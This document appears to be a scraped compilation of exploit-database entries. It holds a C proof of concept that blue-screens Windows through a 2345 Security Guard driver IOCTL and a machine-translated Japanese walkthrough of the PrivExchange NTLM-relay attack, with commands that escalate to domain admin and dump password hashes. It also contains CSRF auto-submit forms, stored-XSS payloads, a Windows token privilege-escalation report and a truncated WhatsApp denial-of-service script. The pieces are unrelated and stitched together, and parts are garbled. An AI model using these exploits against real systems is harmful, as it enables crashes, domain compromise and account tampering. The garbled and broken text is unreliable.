# Exploit Title: [BSOD by IOCTL 0x8000200D in 2345NsProtect.sys of 2345 Security Guard 3.7]
# Date: [20180513]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 11034]
#include <windows.h>
#include <stdio.h>
struct NETFW_IOCTL_ADD_PID
{
DWORD pid;
char seed[0x14];//
};//0x18
struct NETFW_IOCTL_SET_PID
{
BYTE set_state;//
BYTE unk;//1
WORD buf_len;//2
DWORD pid;//4
char buf[0x64];//8
};//6c
struct NETFW_IOCTL_222040
{
DWORD* ptr;
DWORD size;
};//
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
int result;
*a1 ^= *a2;
*a2 ^= *a1;
result = (unsigned __int8)*a2;
*a1 ^= result;
return result;
}
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
int result;
unsigned __int8 v4;
__int16 i;
__int16 j;
unsigned __int8 k;
for ( i = 0; i < 256; ++i )
a3[i] = i;
a3[256] = 0;
a3[257] = 0;
k = 0;
v4 = 0;
result = 0;
for ( j = 0; j < 256; ++j )
{
v4 += a3[j] + a1[k];
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
result = (k + 1) / len;
k = (k + 1) % len;
}
return result;
}
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
char *result;
__int16 i;
unsigned __int8 v5;
unsigned __int8 v6;
v5 = a3[256];
v6 = a3[257];
for ( i = 0; i < len; ++i )
{
v6 += a3[++v5];
f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
}
a3[256] = v5;
result = a3;
a3[257] = v6;
return result;
}
void calc_seed(char* seed, char* dst)
{
char Source1[26] = {0};
char a3[300] = {0};
Source1[0] = 8;
Source1[1] = 14;
Source1[2] = 8;
Source1[3] = 10;
Source1[4] = 2;
Source1[5] = 3;
Source1[6] = 29;
Source1[7] = 23;
Source1[8] = 13;
Source1[9] = 3;
Source1[10] = 15;
Source1[11] = 22;
Source1[12] = 15;
Source1[13] = 7;
Source1[14] = 91;
Source1[15] = 4;
Source1[16] = 18;
Source1[17] = 26;
Source1[18] = 26;
Source1[19] = 3;
Source1[20] = 4;
Source1[21] = 1;
Source1[22] = 15;
Source1[23] = 25;
Source1[24] = 10;
Source1[25] = 13;
sub_12A80(seed, 0x14, a3);
sub_12B60(Source1, 0x1A, a3);
memcpy(dst, Source1, 26);
}
int poc_2345NetFirewall()
{
HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(h == INVALID_HANDLE_VALUE) {
printf("[-] Open device error: %d\n", GetLastError());
return 1;
}
DWORD BytesReturned = 0;
DWORD ctlcode = 0x222298;
NETFW_IOCTL_ADD_PID add_pid = {0};
add_pid.pid = GetCurrentProcessId();
if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
ctlcode = 0x2222A4;
NETFW_IOCTL_SET_PID set_pid = {0};
set_pid.pid = GetCurrentProcessId();
set_pid.set_state = 1;
calc_seed(add_pid.seed, set_pid.buf);
set_pid.buf_len = 26;
if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
//BSOD
ctlcode = 0x222040;
NETFW_IOCTL_222040 buf_222040 = {0};
buf_222040.size = 1;
buf_222040.ptr = (DWORD*)0x80000000;
if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
}
return 0;
}
int main()
{
poc_2345NetFirewall();
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863569176
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
0x00はじめに
ほとんどのアクティブなディレクトリとエクスチェンジでは、Exchangeサーバーには高い権限があります。つまり、Exchangeサーバーの管理者は、ドメイン管理者のアクセス許可に許可を簡単に昇格させることができます。ZDI Webサイトのブログ投稿を見ました。これをNTLMリレーと組み合わせることができます。メールボックスを持っているユーザーからドメイン管理者の特権に権限を高めることができ、Exchangeを使用している企業組織の中で、おそらくエンタープライズ組織の90%がメールボックスを使用してユーザーをドメイン管理者の特権にアップグレードできます。デフォルトでは、この攻撃が可能であり、この特権のエスカレーションを防ぐために防御を適用できます。テキストの詳細といくつかの技術的な詳細と防御、ならびにこの攻撃の検証ツールを書くことは、「PrivexChange」と呼ばれます。 (PrivexChangeはパッチが適用され、利用可能です。公開された更新セクションを参照してください)
0x01既知の脆弱性を活用するために新しい方法を使用して
この記事では、いくつかの既知の脆弱性と既知のプロトコルの脆弱性を新しい攻撃に組み合わせています。 Mailboxからドメイン管理者アクセスを備えたユーザーからのアクセス許可を増やすために、3つのモジュールが組み合わされています。
デフォルトでは、Exchange Serverには高い権限があります
NTLM認証はリレーの影響を受けやすいです
Exchangeには、Exchange Serverのコンピューターアカウントを使用して攻撃者を認証できる機能があります
1.ExchangeおよびHigh Permissions
ここでの主な脆弱性は、ExchangeがActive Directoryドメインに高い権限を持っていることです。 Exchange Windows Permission Groupには、Active Directory内のドメインオブジェクトへのACLアクセスを書いています。これにより、グループのメンバーは、DCSYNC操作を実行する権限を含むドメインアクセスを変更できます。この権限を備えたユーザーまたはコンピューターは、通常、ドメインコントローラーによる複製に使用される同期操作を実行でき、攻撃者はActiveディレクトリのユーザーのすべてのハッシュパスワードを同期させることができます。これは一部の研究者によって発見されました(この記事の終わりにある参照セクションを参照)、私は昨年Fox-itの同僚であるRindertと一緒にブログ投稿を書きました。その投稿では、NTLMRELAYXの更新も投稿しました。これは、NTLMを中継するときにこれらのアクセス制御リスト(ACL)ベースの攻撃を実行する可能性を高めます。
2.ntlmリレーコンピューターアカウント
NTLMリレーはしばらく前から存在しています。以前は、主な焦点は、SMBを介してNTLM認証を中継して、他のホストでのコード実行を有効にすることでした。残念ながら、これはまだSMBの署名やその他のプロトコルを有効にすることで強化されていない多くの企業ネットワークに存在します。私の意見で最も興味深いプロトコルはLDAPです。これは、(アクティブな)ディレクトリのオブジェクトの読み取りと変更に使用できます。 NTLMリレーに関する更新について知る必要がある場合は、私が書いたブログでそれを見つけることができます。要するに、防御が適用されない限り、次の図に示すように、攻撃者のコンピューターがWindowsを介してネットワーク内の他のコンピューターに接続されている場合(自動的に)認証を実行できます。
リレーLDAPを認証する場合、ディレクトリ内のオブジェクトを変更して、DCSYNC操作に必要なアクセス許可を含む攻撃者の許可を付与できます。したがって、NTLM認証を介してExchange Serverを認証できる場合は、ACL攻撃を実行できます。被害者は、SMBを介してHTTPを介して私たちを認証する場合にのみLDAPに中継することができることに注意する必要があります。
3.認証の交換
これまでのところ唯一の欠落コンポーネントは、私たちを認証するための交換を得る簡単な方法です。 ZDIの研究者(記事には名前が付けられていません)は、Exchange PushSubscription機能により、ExchangeがHTTPを介して任意のURLを認証できることを発見しました。彼らのブログ投稿では、彼らはこの脆弱性を使用して、NTLM認証を交換(反射攻撃と呼ばれます)にリレーし、他のユーザーをシミュレートしました。これを交換がデフォルトで持っている高権限と組み合わせると、反射攻撃の代わりにリレー攻撃を実行すると、これらのアクセス許可を使用してDCSYNC許可を自分に付与できます。プッシュ通知サービスには、イベントが発生していなくても、x分ごとにメッセージを送信するオプション(攻撃者はxを指定できます)があります。これにより、Inboxにアクティビティがない場合でも、Exchangeが私たちに接続することが保証されます。
0x02実行許可強化攻撃
以下は、上記の攻撃の概略図を示しており、許可のエスカレーションを実行する手順を示しています。
攻撃を実行するには、privaexchange.pyとntlmrelayxの2つのツールが必要です。 GitHubでPrivexChangeとImpacketライブラリの両方を入手できます。ドメインコントローラーのLDAPをターゲットにし、リレーモードでNTLMRELAYXを起動し、許可の高さのために攻撃者が制御するユーザーを提供します(この場合はNTUユーザー)
ntlmrelayx.py -t ldap: //s2016dc.testsegment.local- escalate -user ntu
次に、priveExchange.pyスクリプトを実行します。
user@localhost:〜/culdpoc $ python privxchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u tu -d testsegment.local
Password:
Info:攻撃者の使用URL: http://DEV.TESTSEGMING.LOCAL/PRIVEXCHANGE/を使用
Info: Exchangeが返されたHTTPステータス200-認証は問題ありませんでした
ERROR:あなたが認証したユーザーには、メールボックスが関連付けられていません。別のユーザーを試してください。
メールボックスなしでユーザーと一緒に実行すると、上記のエラーが発生します。メールボックスに関連付けられているユーザーで再試行しましょう。
user@localhost:〜/culdpoc $ python privxchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local
Password:
Info:攻撃者の使用URL: http://DEV.TESTSEGMING.LOCAL/PRIVEXCHANGE/を使用
Info: Exchangeが返されたHTTPステータス200-認証は問題ありませんでした
Info: APIコールは成功しました
1分後(これはプッシュ通知に提供される値です)、ntlmrelayxの接続が表示されます。
secretsdumpを使用して、dcsyncがハッシュ値をエクスポートできることを確認します
すべてのActive Directoryユーザーのすべてのハッシュパスワードを使用して、攻撃者はゴールドノートを作成してユーザーをエミュレートするか、ユーザーパスワードハッシュを使用して、ドメイン内のNTLMまたはKerberos認証を受け入れるサービスを認証できます。
0x03 LDAPおよび署名攻撃へのリレー
前に、SMBからLDAPへのリレーが機能しないことを前に述べました。そのため、この攻撃は、最近公開されたSpoolservice RPCの乱用を使用して実行できません(これはSMBを介して認証されているため)。これについての質問が発生し続け、それについて多くの疑問があるので、なぜこれが起こるのかを見てみましょう。 NTLM認証を掘り下げたくない場合は、このセクション:をスキップしてください)
SMBとHTTPのNTLM認証の違いは、デフォルトの交渉型IDです。問題のある部分は、NTLMSSP_NEGOTIATE_SIGNFLAG(0x00000010)で、MS-NLMPセクション2.2.2.5に記載されています。デフォルトでは、HTTPでのNTLM認証はこのIDを設定しませんが、このIDがSMBで使用されている場合、このIDはデフォルトで設定されます。
LDAPにリレーすると、認証が成功しますが、LDAPはパスワードから派生したすべてのセッションキーを使用してすべてのメッセージに署名します(リレー攻撃にはこのキーがありません)。したがって、署名されていないメッセージは無視され、攻撃に障害が発生します。署名が交渉されないように、送信中にこれらのアイデンティティを変更することが可能かどうか疑問に思うかもしれません。これは、現在のバージョンのWindowsでは機能しません。これは、マイク(メッセージの整合性チェック)がデフォルトで含まれているため、3つのすべてのNTLMメッセージの署名に基づいているため、メッセージの変更はすべて無効になります。
マイクを削除できますか?はい、それはNTLMメッセージの保護された範囲内ではないためです。ただし、これを防ぐNTLM認証(NTLMV2のみ)には最後の保護があります。NTLMV2応答がある場合、被害者のパスワード署名があり、AV_PAIRが呼ばれ、MSVAVFLAGSになる構造があります。このフィールドの値が0x002の場合、クライアントがマイクとタイプ3のメッセージを送信したことを意味します。
NTLMV2応答を変更すると、認証が無効になるため、この識別フィールドを削除できません。識別フィールドは、コンピューターにマイクが含まれていることを示し、ターゲットサーバーがマイクを確認し、3つのメッセージすべてが送信中に変更されていないことを確認するため、署名IDを削除することはできません。
これは、Microsoftでのみ(私が思う)NTLMで機能します。 NTLMのカスタマイズを実装すると、MICおよびAV_PAIRロゴの追加レベルを下げることはできないため、識別の変更を受けやすくなるため、SMB-LDAPリレーが成功します。この例は、Javaが実装したNTLM攻撃であり、これはセキュリティ防御をバイパスするための送信中に変更できます。
0x04資格情報なしで攻撃を実行します
前のセクションでは、リークされた資格情報を使用して攻撃の最初のステップを実行しました。攻撃者がサイバー攻撃のみを実行できますが、資格情報がない場合でも、認証のために交換をトリガーできます。 smb-to-http(またはhttp-to-http)リレー(llmnr/nbns/mitm6スプーフィングを使用)を行うと、同じネットワークセグメント内のユーザーの認証をリレーして、EWSを交換して、資格情報とのコールバックをトリガーできます(この質問のマークタグのおかげです!)。 httpattack.pyに小さな変更を加えましたが、NTLMRELAYXを使用して資格情報なしで攻撃を実行できます(ファイルで事前に拡張されているため、攻撃者のホストを変更するだけです)
0x05ツール命令
1。ツールと影響を受けるバージョン
検証ツールは、https://github.com/dirkjanm/privexchangeにあります。次のExchange/Windowsバージョンでテスト:
・サーバー2012R2でのExchange2013(CU21)、サーバー2016 DC(完全にパッチされた)に中継
・サーバー2016のExchange2016(CU11)、サーバー2019 DC(完全にパッチされた)に中継
・Server2019で2019をExchange 2019、Server2019 DCに中継(テストに@GentilKiwiに感謝します、完全にパッチしました)
上記のExchangeサーバーは共有許可モード(これはデフォルトモードです)を使用してインストールされますが、この書き込み操作に基づいて、RBACの分割許可展開も攻撃に対して脆弱です(自分でテストしていません)。
Exchange 2010 SP3は影響を受けていないようであり、私の研究室では、このバージョンは上記のSMBと同様の署名を交渉しているため、リレーを破壊します(この質問については @lean0x2fに感謝します)。バージョン14.3.435.0(この記事の執筆時点での最新の更新)とバージョン14.3.123.4の両方が、この結論を示しています。
リリースアップデート:
2019年2月12日、Microsoftは、通知を送信する際に自動認証交換を削除することにより、これらの問題を解決するExchange Updateをリリースしました。これには、次の交換バージョンが含まれます。
Exchange Server 2019アップデートバージョン
Exchange Server 2016アップデートバージョン12
Exchange Server 2013アップデートバージョン22
・Exchange Server 2010 Service Pack 3更新ロールアップ26
さらに、Exchangeが必要とする権限をチェックする必要があり、これらのアクセス許可を減らすことを決定して、ExchangeがADに過度のAD許可を持たないようにします。既存の交換インストールの場合、更新されたインストーラーから再度setup.exe/preaiedを実行する必要があります。そうしないと、これらのアクセス許可は削除されません。 Exchange 2010の場合、権限を手動で削除する必要があり、関連する指示はKB4490059で取得できます。
このホットフィックスの詳細については、Microsoft Exchangeブログを参照してください。
2.PrivexChange使用法
2.1インストール要件
これらのツールはパッケージ化する必要があります。コマンドPIPインストールImpacketを使用してインストールできますが、GitHubの最新バージョンを使用することをお勧めします。
2.2privexchange.pyこのツールは、通知情報をプッシュするためにサブスクライブするためにExchange Webサービスにログインするだけです。これにより、Exchangeをサーバーに再接続し、認証のためのシステムログインとして認証されます。適切に機能させるには:
httpatack.pyの攻撃者のURLを変更して、ntlmrelayxを実行する攻撃者サーバーを指す
githubのclone git clonehttps://github.com/secureauthcorp/impacket
このファイルを/Impacket/Impacket/Examples/ntlmrelayx/Attacks/Directoryにコピーします
CDインパケット
コマンドPIPインストールを使用します。 - 更新をインストールするためにアップグレードするか、コマンドPIPインストール-Eを使用します。変更されたインパックバージョンをインストールします
3.Exchange2Domain ---簡素化されたバージョンの使用
単純化されたPrivexChange利用ツール。 Web Serverポートを開くだけで、高い権限が必要になる必要はありません。
3.1インストール要件
これらのツールはパッケージ化する必要があります。コマンドPIPインストールImpacketを使用して(https://github.com/ridter/exchange2domain)を使用できます。
3.2使用
USAGE: Exchange2Domain.py [-H] [-U Username] [-D Domain] [-Pパスワード]
[ - ハッシュハッシュ] [ - -No-SSL]
[-Exchange-Port Exchange_Port] -AH Attacker_Host
[-ap astiter_port] -th target_host
[-exec-method [{smbexec、wmiexec、mmcexec}]]]]
[-Exchange-version Exchange_version]
[-Attacker-Page Attacker_Page]
[-just-dc-user username] [ - debug]
ホスト名
交換を乱用することにより、ドメイン管理者の特権を交換します。私を使ってください
ntlmrelayxで
位置引数:
Exchange ServerのHostname HostName/IP
オプションの引数:
-H、 - ヘルプこのヘルプメッセージと出口を表示します
-u username、-user username
認証用のユーザー名
-dドメイン、 - ドメインドメイン
ドメインユーザーは(fqdnまたはnetbiosドメイン名)にあります
-pパスワード、 - パスワードパスワード
認証のパスワードは、そうでない場合はプロンプトが表示されます
指定されており、NT:NTLMハッシュは提供されません
- ハッシュハッシュLM:NLTMハッシュ
-No-SSLはHTTPSを使用しません(ポート80で接続)
-Exchange-Port Exchange_port
代替EWSポート(デフォルト: 443または80)
-AH ASTICTER_HOST、-ATTACKER-HOST ATTICKER_HOST
攻撃者のホスト名またはIP
-ap astiter_port、-attacker-port Attacker_port
リレー攻撃が実行されるポート(デフォルト: 80)
-th target_host、-target-host target_host
DCのホスト名またはIP
-exec-method [{smbexec、wmiexec、mmcexec}]
ターゲットで使用するリモートエグゼクティブメソッド(使用する場合のみ
-USE-VSS)。 default: smbexec
-Exchange -Version Exchange_version
ターゲットの交換バージョン(Default: Exchange2013、
Choices:Exchange2010、Exchange2010_sp1、Exchange2010_sp2
、Exchange2013、Exchange2013_sp1、Exchange2016)
-ATTACKER-PAGE ATTICHER_PAGE
攻撃者サーバーでリクエストするページ(default:
/privexchange/)
-dc-userユーザー名
指定されたユーザーのNTDS.DITデータのみを抽出します。
Drsuapiアプローチでのみ利用できます。
- デバッグ出力を有効にします
例えば:
python exchange2domain.py -ah aptherterip -ap ristenport -u user -p password -d domain.com -th dcip mailserverip
krbtgtをダンプしたい場合は、-dc-userを使用してください。
Python Exchange2Domain.py -Ah Actustterip -Uユーザー-Pパスワード-D domain.com -th dcip -just -dc -user krbtgt mailserverip
0x06防御測定
以前のブログでは、NTLMリレーのためのいくつかの防御方法、特にLDAPへのリレーのディフェンスを強調しました。
この攻撃の最も重要な防御は次のとおりです。
・setup.exe/preateadをパッチした交換CUから実行して、ドメインオブジェクトへの交換用の不要な高権限を削除します(詳細については以下を参照)
・LDAP署名を有効にし、LDAPチャネルバインディングをそれぞれLDAPとLDAPへのリレーを防止できるようにします
・Exchangeサーバーは、ポート上のクライアントサービスとの接続を確立することをブロックします。
IISの交換エンドポイントでの認証の拡張保護を有効にします(ただし、Exchangeバックエンドエンドポイントではなく、交換は中断されます)。これにより、NTLM認証のチャネルバインディングパラメーターが検証され、NTLM認証がTLS接続に結合し、Webサービスを交換するための中継を防ぎます。
・消去
# Exploit Title: MyBB Admin Notes Plugin - CSRF
# Date: 2018-05-14
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
# Version: 1.1
# Tested on: Ubuntu 18.04
# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
# 2. Proof of Concept:
<html>
<body>
<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
</body>
</html>
# 3. Solution:
# Update to the latest release
# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split
# Exploit Title: Multiplayer BlackJack - Online Casino Game 2.5 - Persistent Cross-Site scripting
# Date: 2018-05-16
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/multiplayer-blackjack-online-casino-game/15411706?s_rank=1628
# CVE: N/A
# Version: 2.5
# Description : Multiplayer BlackJack - Online Casino Game script has persistent cross site scripting that attacker
# can set malicious payload into the vulnerable parameter.
# POC :
1) click on the "sit" button in the web page
2) Put this payload into the "name" input and set wallet number :
<script>alert(document.domain)</script>
3) You will get an alert box in the page .
# Exploit Title: Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery
# Date: 2018-05-15
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725
# CVE: N/A
# Version: 1.5.7
# Tested on: Kali linux
# Details:
# Horse Market Sell & Rent Portal Script has CSRF vulnerability which attacker can change user information.
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/horse-script/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name_surname" value="D3C0DE" />
<input type="hidden" name="username" value="L0RD" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password_confirm" value="anything" />
<input type="hidden" name="address" value="Cyro trento 23" />
<input type="hidden" name="description" value="My description 2" />
<input type="hidden" name="phone" value="+10101010" />
<input type="hidden" name="mail" value="lord@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Exploit Title: VirtueMart 3.1.14 - Persistent Cross-Site Scripting
# Date: 2018-02-25
# Software Link: http://virtuemart.net/
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-7465
# Category: webapps
# 1. Description
# An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the admin area of the plugin can be closed by simply adding </textarea> to the value and saving the product/config. By editing back the product/config, the editor's browser will execute everything after the </textarea>, leading to a possible XSS.
# 2. Proof of Concept
Having the permissions to edit the config/products, you can simply write </textarea><script>alert(1)</script> inside a textarea, when someone will edit it back the alert will execute on the editor's browser
# 3. Solution: Upgrade to 3.2.14
# http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling
# Exploit Title: Rockwell Scada System - Cross-Site Scripting
# Date: 2018-05-16
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://rockwellautomation.com/
# Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4
# Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier,
# 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B,
# Version 27.011 and earlier, 1769-L24ER-QBFC1B
# Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier
# 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier,
# 1769-L30ER-NSE, Version 27.011 and earlier
# 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier
# 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier
# (Discontinued June 2016).
# Tested on: Windows Machine and Chrome,Firefox explorer
# CVE : CVE-2016-2279
# PoC
http://TargetIP/rokform/SysDataDetail?name=<<script>alert(1);</script>
Windows: Token Trust SID Access Check Bypass EOP
Platform: Windows 10 1709 (also tested current build of RS4)
Class: Elevation of Privilege
Summary: A token’s trust SID isn’t reset when setting a token after process creation allowing a user process to bypass access checks for trust labels.
Description:
When a protected process is created it sets the protection inside the EPROCESS structure but also adds a special trust SID to the primary token as part of SeSubProcessToken. Where the process protection is used for things such as what access rights to other processes the trust SID is used for direct access checks where a security descriptor has a process trust label. A good example is the \KnownDlls object directory which is labeled as PPL-WinTcb to prevent tampering from anything not at that protection level.
This trust SID isn’t cleared during duplication so it’s possible for a non-protected process to open the token of a protected process and duplicate it with the trust SID intact. However using that token should clear the SID, or at least cap it to the maximum process protection level. However there’s a missing edge case, when setting a primary token through NtSetInformationProcess (specifically in PspAssignPrimaryToken). Therefore we can exploit this with the following from a normal non-admin process:
1) Create a protected process, werfaultsecure.exe is a good candidate as it’ll run PP-WinTcb. It doesn’t have to do anything special, just be created.
2) Open the process token (we get PROCESS_QUERY_LIMITED_INFORMATION) and duplicate it to a new primary token.
3) Create a new suspended process which will run the exploit code with the original token.
4) Set the protected process token using NtSetInformationProcess
5) Resume exploit process and do something which needs to pass the trust label check.
NOTE: There is also a related issue during impersonation and the call to SeTokenCanImpersonate. Normally the current process trust SID is checked against the impersonation token trust SID and if the process token’s is lower a flag is returned to the caller which resets the new token’s trust SID to the process one. This check occurs before the check for SeImpersonatePrivilege but _after_ the check for an anonymous token authentication ID. Therefore if you’re an admin you could craft a token with the anonymous token authentication ID (but with actual groups) and do a similar trick as with the process token to prevent the reset of the trust SID during impersonation. However I couldn’t find an obvious use for this as the trust label seems to be based on the minimum between the impersonation and process token’s trust SIDs and when impersonating over a boundary such as in RPC it looks like it gets reset to the process’ protection level. But might be worth cleaning this up as well if you’re there.
Proof of Concept:
I’ve provided a PoC as a C# project. It does the previous described trick to run a process which can then set the trust label on a new event object it creates (\BaseNamedObject\PPDEMO). If you run the poc with a command line parameter it will try and do the event creation but should print access denied.
1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
2) Run the poc with no parameters as a normal user. It will capture the token and respawn itself to create the event.
Expected Result:
Setting the trust label returns access denied.
Observed Result:
The trust label is successfully set.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44630.zip
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> at Exploit Pack
- http://www.exploitpack.com
# This vulnerability has been discovered and exploited using Exploit
Pack - Framework
#
# Tested on: iPhone 5/6s/X iOS 10 and 11.3 ( Latest release of iOS at
the date of writing this code )
#
# Description:
# WhatsApp 2.18.31 and prior are affected. The application fails to
properly filter user-supplied input and its prone to a remote memory
corruption.
#
# Impact:
# Resource exhaustion attacks exploit a design flaw. An attacker could
exploit this vulnerability to remotely corrupt the memory of the
application forcing an uhandled exception
# in the context of the application that could potentially result in a
denial-of-service condition and/or remote memory corruption.
#
# Debug:
# B04500954836","name":"WhatsApp"}
# Date/Time: 2018-04-06 18:15:30.608135 +0200
# OS Version: iPhone OS 11.2.6 (Build 15D100)
# Architecture: arm64
# Report Version: 19
# Command: WhatsApp
# Path:
/private/var/containers/Bundle/Application/2F86B692-D9A3-4BAC-B45E-6DCF62F47C2C/WhatsApp.app/WhatsApp
# Version: 2.18.31 (2.18.31.32)
# Beta Identifier: 4CA20191-C4A3-4920-ADEB-9ABAD10FCDF7
# Parent: launchd [1]
# PID: 28010
# Event: cpu usage
# CPU: 144s cpu time over 145 seconds (99% cpu average),
exceeding limit of 80% cpu over 180 seconds
# Action taken: Process killed
# Duration: 144.81s
# Steps: 48
# Hardware model: iPhone7,1
# Exception Type: EXC_CRASH (SIGKILL)
#
# How to use this exploit:
# Send the payload as a message to a whatsapp user, trough a phone or
whatsapp-web.
#
# Timeline:
# Date and time of release: 6 April 2018
# Triaged by Facebook: 25 April 2018
# Reported to Apple ( it's a bug on their side ): 01 May 2018
# Vendor homepage: http://www.whatsapp.com / http://www.facebook.com
import sys
reload(sys)
def whatsapp(filename):
sys.setdefaultencoding("utf-8")
